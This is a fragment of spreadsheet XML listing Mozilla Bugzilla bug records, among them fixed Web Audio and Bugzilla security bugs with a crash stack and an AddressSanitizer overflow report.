      <c r="H2975" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2975" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2975" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K2975" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2975" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2975" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2975" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2975" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2975" t="inlineStr">
        <is>
          <t>[adv-main40+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2975" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2975" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2975" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T2975" t="n">
        <v>1</v>
      </c>
      <c r="U2975" t="n">
        <v>0</v>
      </c>
      <c r="V2975" t="n">
        <v>17</v>
      </c>
      <c r="W2975" t="inlineStr">
        <is>
          <t>This has only been observed on android 4.0. (And only on mozilla-beta, since the android 4.0 tests are disabled on aurora and central) The patch from bug 1182289 detected this problem.</t>
        </is>
      </c>
      <c r="X2975" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2976">
      <c r="A2976" t="n">
        <v>991533</v>
      </c>
      <c r="B2976" t="inlineStr">
        <is>
          <t>2014-04-03 01:11:25 -0700</t>
        </is>
      </c>
      <c r="C2976" t="inlineStr">
        <is>
          <t>limit AudioBuffer channel counts and sample rate range</t>
        </is>
      </c>
      <c r="D2976" t="inlineStr">
        <is>
          <t>2024-05-30 08:33:34 -0700</t>
        </is>
      </c>
      <c r="E2976" t="n">
        <v>1</v>
      </c>
      <c r="F2976" t="n">
        <v>1</v>
      </c>
      <c r="G2976" t="n">
        <v>3</v>
      </c>
      <c r="H2976" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2976" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2976" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K2976" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2976" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2976" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2976" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2976" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2976" t="inlineStr">
        <is>
          <t>[external reporter][adv-main30+]</t>
        </is>
      </c>
      <c r="Q2976" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2976" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2976" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T2976" t="n">
        <v>1</v>
      </c>
      <c r="U2976" t="n">
        <v>0</v>
      </c>
      <c r="V2976" t="n">
        <v>43</v>
      </c>
      <c r="W2976" t="inlineStr">
        <is>
          <t>Bug 987679 identified a critical security bug using the Speex resampler with
extreme down-sampling ratios and/or channel counts.
When the resampler code is patched to fix that, there still remains a null
deref crash.
We don't need to handle so many channels and large numbers of channels have
led to other security bugs such as bug 990794.  There have been previous
attempts to limit the number of channels in bug 877039 and bug 987976 but
there are still ways to go beyond the intended limit of 32 channels.
We can't hope to support extreme down-sampling ratios successfully because
this requires processing a huge number of input samples per output sample, so
there is little harm in applying a limit on sample rates.</t>
        </is>
      </c>
      <c r="X2976" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2977">
      <c r="A2977" t="n">
        <v>1181159</v>
      </c>
      <c r="B2977" t="inlineStr">
        <is>
          <t>2015-07-07 08:29:14 -0700</t>
        </is>
      </c>
      <c r="C2977" t="inlineStr">
        <is>
          <t>Document required permissions for deployment and who has them</t>
        </is>
      </c>
      <c r="D2977" t="inlineStr">
        <is>
          <t>2016-02-21 20:31:38 -0800</t>
        </is>
      </c>
      <c r="E2977" t="n">
        <v>1</v>
      </c>
      <c r="F2977" t="n">
        <v>1</v>
      </c>
      <c r="G2977" t="n">
        <v>6</v>
      </c>
      <c r="H2977" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2977" t="inlineStr">
        <is>
          <t>MozReview Graveyard</t>
        </is>
      </c>
      <c r="J2977" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2977" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2977" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2977" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2977" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2977" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2977" t="inlineStr"/>
      <c r="Q2977" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2977" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2977" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2977" t="n">
        <v>1</v>
      </c>
      <c r="U2977" t="n">
        <v>0</v>
      </c>
      <c r="V2977" t="n">
        <v>2</v>
      </c>
      <c r="W2977" t="inlineStr">
        <is>
          <t>In order to deploy to dev and to prod, a user needs permissions on several systems.  These should be documented on our mana page (https://mana.mozilla.org/wiki/display/websites/reviewboard.mozilla.org#reviewboard.mozilla.org-Update/Pushprocedure).
In addition, we should ensure that at least three people have deployment privileges, and that their names are documented as well.
Giving this to gps since he is the main (only?) person for prod deployments.</t>
        </is>
      </c>
      <c r="X2977" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2978">
      <c r="A2978" t="n">
        <v>70189</v>
      </c>
      <c r="B2978" t="inlineStr">
        <is>
          <t>2001-02-26 06:34:39 -0800</t>
        </is>
      </c>
      <c r="C2978" t="inlineStr">
        <is>
          <t>showattachment.cgi doesn't check viewing permissions</t>
        </is>
      </c>
      <c r="D2978" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:23 -0800</t>
        </is>
      </c>
      <c r="E2978" t="n">
        <v>1</v>
      </c>
      <c r="F2978" t="n">
        <v>1</v>
      </c>
      <c r="G2978" t="n">
        <v>4</v>
      </c>
      <c r="H2978" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2978" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2978" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K2978" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2978" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2978" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2978" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2978" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2978" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q2978" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2978" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2978" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T2978" t="n">
        <v>1</v>
      </c>
      <c r="U2978" t="n">
        <v>0</v>
      </c>
      <c r="V2978" t="n">
        <v>14</v>
      </c>
      <c r="W2978" t="inlineStr">
        <is>
          <t>One of the reasons listed for having bug security is the possibility that
proprietary code could be associated w/that bug.  There's a good chance that
this code could be in an attachment.  showattachment.cgi should thus check the
viewing permissions on a bug before spitting out the data.  If the idea I listed
in bug 39816 is used, this would be fixed by changing the SQL query to:
select mimetype, bug_id, thedata from attachments where attach_id =" .
SqlQuote($::FORM{'attach_id'})
Then adding something along the lines of:
if (!UserCanSeeBug($row[1]) {
    # Error message about not being able to view the attachment here
}
And, of course, changing the print line to:
print qq{Content-type: $row[0]\n\n$row[2]};</t>
        </is>
      </c>
      <c r="X2978" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2979">
      <c r="A2979" t="n">
        <v>863775</v>
      </c>
      <c r="B2979" t="inlineStr">
        <is>
          <t>2013-04-19 10:02:13 -0700</t>
        </is>
      </c>
      <c r="C2979" t="inlineStr">
        <is>
          <t>[fireplace] Create API middleware for geodude</t>
        </is>
      </c>
      <c r="D2979" t="inlineStr">
        <is>
          <t>2013-04-24 16:41:26 -0700</t>
        </is>
      </c>
      <c r="E2979" t="n">
        <v>1</v>
      </c>
      <c r="F2979" t="n">
        <v>1</v>
      </c>
      <c r="G2979" t="n">
        <v>6</v>
      </c>
      <c r="H2979" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2979" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J2979" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K2979" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L2979" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2979" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2979" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2979" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2979" t="inlineStr">
        <is>
          <t>[fireplace] p=1</t>
        </is>
      </c>
      <c r="Q2979" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2979" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2979" t="inlineStr">
        <is>
          <t>2013-04-25</t>
        </is>
      </c>
      <c r="T2979" t="n">
        <v>1</v>
      </c>
      <c r="U2979" t="n">
        <v>0</v>
      </c>
      <c r="V2979" t="n">
        <v>12</v>
      </c>
      <c r="W2979" t="inlineStr">
        <is>
          <t>If a client makes a GET request to any API endpoint which serves app listings (at minimum the homepage, search, and featured APIs) and the query parameter `region` is present but empty or `null` (e.g.: /api/v1/home/page/?region=&amp;_user=... or /api/v1/home/page/?region=null&amp;_user=...), geodude should be polled before the request is processed.
Geodude's response should be used as the region for the request. An HTTP header should be set (e.g.: `X-User-Region: br`).
The client should respect the header and use it for all future requests (because of this, geodude will only be queried for the first hit to the API).
This conceivably doesn't necessarily need to be middleware, but if I were doing it, that's probably how I'd do it. Feel free to update the bug.</t>
        </is>
      </c>
      <c r="X2979" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2980">
      <c r="A2980" t="n">
        <v>507114</v>
      </c>
      <c r="B2980" t="inlineStr">
        <is>
          <t>2009-07-29 06:07:30 -0700</t>
        </is>
      </c>
      <c r="C2980" t="inlineStr">
        <is>
          <t>[Win] Topcrasher for Firefox 3.5.1 [@ memmove | nsTArray_base::ShiftData(unsigned int, unsigned int, unsigned int, unsigned int)][@ nsObserverList::FillObserverArray]</t>
        </is>
      </c>
      <c r="D2980" t="inlineStr">
        <is>
          <t>2024-01-10 22:00:41 -0800</t>
        </is>
      </c>
      <c r="E2980" t="n">
        <v>1</v>
      </c>
      <c r="F2980" t="n">
        <v>1</v>
      </c>
      <c r="G2980" t="n">
        <v>3</v>
      </c>
      <c r="H2980" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2980" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2980" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K2980" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2980" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2980" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2980" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2980" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2980" t="inlineStr">
        <is>
          <t>[crashkill-fix][verify on both 1.9.1.7 and 1.9.1.8]</t>
        </is>
      </c>
      <c r="Q2980" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2980" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2980" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T2980" t="n">
        <v>1</v>
      </c>
      <c r="U2980" t="n">
        <v>0</v>
      </c>
      <c r="V2980" t="n">
        <v>49</v>
      </c>
      <c r="W2980" t="inlineStr">
        <is>
          <t>There is a #1 topcrasher on 1.9.1 with the following stack. This bug has been filed by request on bug 494617.
Some comments:
* Playing games at Iwon.com - lost all my coins!
* Took me off the scrabble game i was playing through the facebook link. Was the first game that i was playing for the night, hadnt even put my first word up.
* im not understanding why i keep getting these low memory warnings i have deleted firfox and reinstalled it and still get this warnings. why dose this happen on this site.
Stack:
0  	mozcrt19.dll  	memmove  	MEMCPY.ASM:188
1 	xul.dll 	nsTArray_base::ShiftData 	obj-firefox/xpcom/build/nsTArray.cpp:173
2 	xul.dll 	nsObserverList::FillObserverArray 	xpcom/ds/nsObserverList.cpp:110
3 	xul.dll 	xul.dll@0x8aea63</t>
        </is>
      </c>
      <c r="X2980" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2981">
      <c r="A2981" t="n">
        <v>1020205</v>
      </c>
      <c r="B2981" t="inlineStr">
        <is>
          <t>2014-06-04 02:46:50 -0700</t>
        </is>
      </c>
      <c r="C2981" t="inlineStr">
        <is>
          <t>heap-buffer-overflow in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer</t>
        </is>
      </c>
      <c r="D2981" t="inlineStr">
        <is>
          <t>2024-05-30 08:35:08 -0700</t>
        </is>
      </c>
      <c r="E2981" t="n">
        <v>1</v>
      </c>
      <c r="F2981" t="n">
        <v>1</v>
      </c>
      <c r="G2981" t="n">
        <v>3</v>
      </c>
      <c r="H2981" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2981" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2981" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K2981" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2981" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2981" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2981" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2981" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2981" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q2981" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2981" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2981" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T2981" t="n">
        <v>1</v>
      </c>
      <c r="U2981" t="n">
        <v>0</v>
      </c>
      <c r="V2981" t="n">
        <v>17</v>
      </c>
      <c r="W2981" t="inlineStr">
        <is>
          <t>Created attachment 8434019
Repro-file
Tested on:
OS: Ubuntu 12.04
Firefox: ASAN build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1401807026/
ASAN-report:
==6994==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f37adc1aea0 at pc 0x43906e bp 0x7f37b1d150e0 sp 0x7f37b1d14898
READ of size 17179677220 at 0x7f37adc1aea0 thread T27 (MediaStreamGrph)
    #0 0x43906d in __interceptor_memcpy _asan_rtl_
    #1 0x7f37dc4b8e09 in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer(mozilla::AudioChunk*, unsigned int, unsigned long, unsigned int) /home/attekett/firefox/content/media/webaudio/AudioBufferSourceNode.cpp:222
    #2 0x7f37dc4b830a in mozilla::dom::AudioBufferSourceNodeEngine::ProcessBlock(mozilla::AudioNodeStream*, mozilla::AudioChunk const&amp;, mozilla::AudioChunk*, bool*) /home/attekett/firefox/content/media/webaudio/AudioBufferSourceNode.cpp:470
    #3 0x7f37dc3b0d10 in mozilla::AudioNodeStream::ProcessInput(long, long, unsigned int) /home/attekett/firefox/content/media/AudioNodeStream.cpp:468
    #4 0x7f37dc419781 in mozilla::MediaStreamGraphImpl::ProduceDataForStreamsBlockByBlock(unsigned int, int, long, long) /home/attekett/firefox/content/media/MediaStreamGraph.cpp:1192
    #5 0x7f37dc41a83a in mozilla::MediaStreamGraphImpl::RunThread() /home/attekett/firefox/content/media/MediaStreamGraph.cpp:1356
    #6 0x7f37dc435fee in mozilla::(anonymous namespace)::MediaStreamGraphInitThreadRunnable::Run() /home/attekett/firefox/content/media/MediaStreamGraph.cpp:1512
    #7 0x7f37d8aade08 in nsThread::ProcessNextEvent(bool, bool*) /home/attekett/firefox/xpcom/threads/nsThread.cpp:766
    #8 0x7f37d8992e09 in NS_ProcessNextEvent(nsIThread*, bool) /home/attekett/firefox/xpcom/glue/nsThreadUtils.cpp:263
    #9 0x7f37d92b826c in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/attekett/firefox/ipc/glue/MessagePump.cpp:307
    #10 0x7f37d92461fe in MessageLoop::RunInternal() /home/attekett/firefox/ipc/chromium/src/base/message_loop.cc:229
    #11 0x7f37d8aab375 in nsThread::ThreadFunc(void*) /home/attekett/firefox/xpcom/threads/nsThread.cpp:346
    #12 0x7f37e4152e95 in _pt_root /home/attekett/firefox/nsprpub/pr/src/pthreads/ptthread.c:212
    #13 0x7f37e766ae99 in start_thread ??:0
    #14 0x7f37e67753fc in ?? ??:0
0x7f37adc1aea0 is located 0 bytes to the right of 149152-byte region [0x7f37adbf6800,0x7f37adc1aea0)
allocated by thread T0 here:
    #0 0x45f9d5 in __interceptor_calloc _asan_rtl_
    #1 0x7f37df8b439a in js_calloc(unsigned long) /home/attekett/firefox/objdir-ff-asan/js/src/../../dist/include/js/Utility.h:104
    #2 0x7f37df8b5563 in js::ArrayBufferObject::stealContents(JSContext*, JS::Handle&lt;js::ArrayBufferObject*&gt;) /home/attekett/firefox/js/src/vm/ArrayBufferObject.cpp:750
    #3 0x7f37df8b9d5f in JS_StealArrayBufferContents(JSContext*, JS::Handle&lt;JSObject*&gt;) /home/attekett/firefox/js/src/vm/ArrayBufferObject.cpp:1124
    #4 0x7f37dc48dd87 in mozilla::dom::StealJSArrayDataIntoThreadSharedFloatArrayBufferList(JSContext*, nsTArray&lt;JSObject*&gt; const&amp;) /home/attekett/firefox/content/media/webaudio/AudioBuffer.cpp:223
    #5 0x7f37dc49094d in mozilla::dom::AudioBufferSourceNode::SendBufferParameterToStream(JSContext*) /home/attekett/firefox/content/media/webaudio/AudioBufferSourceNode.cpp:633
    #6 0x7f37da247406 in mozilla::dom::AudioBufferSourceNode::SetBuffer(JSContext*, mozilla::dom::AudioBuffer*) /home/attekett/firefox/objdir-ff-asan/dom/bindings/../../dist/include/mozilla/dom/AudioBufferSourceNode.h:56
    #7 0x7f37db141107 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/attekett/firefox/dom/bindings/BindingUtils.cpp:2316
    #8 0x7f37df9e9c13 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /home/attekett/firefox/js/src/jscntxtinlines.h:239
    #9 0x7f37df974ace in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) /home/attekett/firefox/js/src/vm/Interpreter.cpp:511
    #10 0x7f37df9eb9dd in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /home/attekett/firefox/js/src/vm/Interpreter.cpp:583
    #11 0x7f37df7ad310 in js::Shape::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /home/attekett/firefox/js/src/vm/Shape-inl.h:95
    #12 0x7f37df7aea18 in bool js::baseops::SetPropertyHelper&lt;(js::ExecutionMode)0&gt;(js::ExecutionModeTraits&lt;(js::ExecutionMode)0&gt;::ContextType, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, js::baseops::QualifiedBool, JS::MutableHandle&lt;JS::Value&gt;, bool) /home/attekett/firefox/js/src/jsobj.cpp:5069
    #13 0x7f37df9cf7cb in SetPropertyOperation(JSContext*, JS::Handle&lt;JSScript*&gt;, unsigned char*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /home/attekett/firefox/js/src/vm/Interpreter.cpp:314
    #14 0x7f37df9c056c in js::RunScript(JSContext*, js::RunState&amp;) /home/attekett/firefox/js/src/vm/Interpreter.cpp:402
    #15 0x7f37df9ea161 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /home/attekett/firefox/js/src/vm/Interpreter.cpp:474
    #16 0x7f37df974ace in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) /home/attekett/firefox/js/src/vm/Interpreter.cpp:511
    #17 0x7f37df608875 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/attekett/firefox/js/src/jsapi.cpp:5210
    #18 0x7f37da6ce4cd in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, mozilla::ErrorResult&amp;) /home/attekett/firefox/objdir-ff-asan/dom/bindings/./FunctionBinding.cpp:34
    #19 0x7f37db771ebe in JS::Value mozilla::dom::Function::Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt;(nsCOMPtr&lt;nsISupports&gt; const&amp;, nsTArray&lt;JS::Value&gt; const&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) /home/attekett/firefox/objdir-ff-asan/dom/base/../../dist/include/mozilla/dom/FunctionBinding.h:58
    #20 0x7f37db747dd0 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) /home/attekett/firefox/dom/base/nsGlobalWindow.cpp:12106
    #21 0x7f37db72c23a in nsGlobalWindow::RunTimeout(nsTimeout*) /home/attekett/firefox/dom/base/nsGlobalWindow.cpp:12330
    #22 0x7f37db74755f in nsGlobalWindow::TimerCallback(nsITimer*, void*) /home/attekett/firefox/dom/base/nsGlobalWindow.cpp:12576
    #23 0x7f37d8ab5390 in nsTimerImpl::Fire() /home/attekett/firefox/xpcom/threads/nsTimerImpl.cpp:609
    #24 0x7f37d8ab594e in nsTimerEvent::Run() /home/attekett/firefox/xpcom/threads/nsTimerImpl.cpp:702
    #25 0x7f37d8aade08 in nsThread::ProcessNextEvent(bool, bool*) /home/attekett/firefox/xpcom/threads/nsThread.cpp:766
    #26 0x7f37d8992e09 in NS_ProcessNextEvent(nsIThread*, bool) /home/attekett/firefox/xpcom/glue/nsThreadUtils.cpp:263
    #27 0x7f37d92b7384 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/attekett/firefox/ipc/glue/MessagePump.cpp:136
    #28 0x7f37d92461fe in MessageLoop::RunInternal() /home/attekett/firefox/ipc/chromium/src/base/message_loop.cc:229
    #29 0x7f37db35be2f in nsBaseAppShell::Run() /home/attekett/firefox/widget/xpwidgets/nsBaseAppShell.cpp:164
Thread T27 (MediaStreamGrph) created by T0 here:
    #0 0x423626 in __interceptor_pthread_create _asan_rtl_
    #1 0x7f37e414f81d in _PR_CreateThread /home/attekett/firefox/nsprpub/pr/src/pthreads/ptthread.c:453
    #2 0x7f37e414f39a in PR_CreateThread /home/attekett/firefox/nsprpub/pr/src/pthreads/ptthread.c:544
    #3 0x7f37d8aac31a in nsThread::Init() /home/attekett/firefox/xpcom/threads/nsThread.cpp:423
    #4 0x7f37d8ab06a8 in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) /home/attekett/firefox/xpcom/threads/nsThreadManager.cpp:248
    #5 0x7f37d8992605 in NS_NewThread(nsIThread**, nsIRunnable*, unsigned int) /home/attekett/firefox/xpcom/glue/nsThreadUtils.cpp:67
    #6 0x7f37dc41ba5c in tag_nsresult NS_NewNamedThread&lt;16ul&gt;(char const (&amp;) [16ul], nsIThread**, nsIRunnable*, unsigned int) /home/attekett/firefox/objdir-ff-asan/content/media/../../dist/include/nsThreadUtils.h:75
    #7 0x7f37dc435c10 in mozilla::(anonymous namespace)::MediaStreamGraphStableStateRunnable::Run() /home/attekett/firefox/content/media/MediaStreamGraph.cpp:1580
    #8 0x7f37db35ce0d in nsCOMPtr_base::assign_assuming_AddRef(nsISupports*) /home/attekett/firefox/objdir-ff-asan/widget/xpwidgets/../../dist/include/nsCOMPtr.h:486
    #9 0x7f37db35d3cd in nsBaseAppShell::AfterProcessNextEvent(nsIThreadInternal*, unsigned int, bool) /home/attekett/firefox/widget/xpwidgets/nsBaseAppShell.h:93
    #10 0x7f37d8aae2ab in nsThread::ProcessNextEvent(bool, bool*) /home/attekett/firefox/xpcom/threads/nsThread.cpp:780
    #11 0x7f37d8992e09 in NS_ProcessNextEvent(nsIThread*, bool) /home/attekett/firefox/xpcom/glue/nsThreadUtils.cpp:263
    #12 0x7f37d92b73a5 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/attekett/firefox/ipc/glue/MessagePump.cpp:95
    #13 0x7f37d92461fe in MessageLoop::RunInternal() /home/attekett/firefox/ipc/chromium/src/base/message_loop.cc:229
    #14 0x7f37db35be2f in nsBaseAppShell::Run() /home/attekett/firefox/widget/xpwidgets/nsBaseAppShell.cpp:164
    #15 0x7f37ddc0e8b6 in nsAppStartup::Run() /home/attekett/firefox/toolkit/components/startup/nsAppStartup.cpp:278
    #16 0x7f37dda7eba8 in XREMain::XRE_mainRun() /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4012
    #17 0x7f37dda7f849 in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4083
    #18 0x7f37dda8018b in XRE_main /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4297
    #19 0x479fa6 in do_main(int, char**, nsIFile*) /home/attekett/firefox/browser/app/nsBrowserApp.cpp:282
    #20 0x7f37e66a276c in ?? ??:0
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0fe775b7b580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe775b7b590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe775b7b5a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe775b7b5b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe775b7b5c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0fe775b7b5d0: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0fe775b7b5e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe775b7b5f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe775b7b600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe775b7b610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe775b7b62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6994==ABORTING</t>
        </is>
      </c>
      <c r="X2981" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2982">
      <c r="A2982" t="n">
        <v>867655</v>
      </c>
      <c r="B2982" t="inlineStr">
        <is>
          <t>2013-05-01 10:32:52 -0700</t>
        </is>
      </c>
      <c r="C2982" t="inlineStr">
        <is>
          <t>Don't prepopulate Troubleshooting information on the edit question page.</t>
        </is>
      </c>
      <c r="D2982" t="inlineStr">
        <is>
          <t>2013-05-02 13:57:43 -0700</t>
        </is>
      </c>
      <c r="E2982" t="n">
        <v>1</v>
      </c>
      <c r="F2982" t="n">
        <v>1</v>
      </c>
      <c r="G2982" t="n">
        <v>5</v>
      </c>
      <c r="H2982" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2982" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2982" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K2982" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2982" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2982" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2982" t="inlineStr">
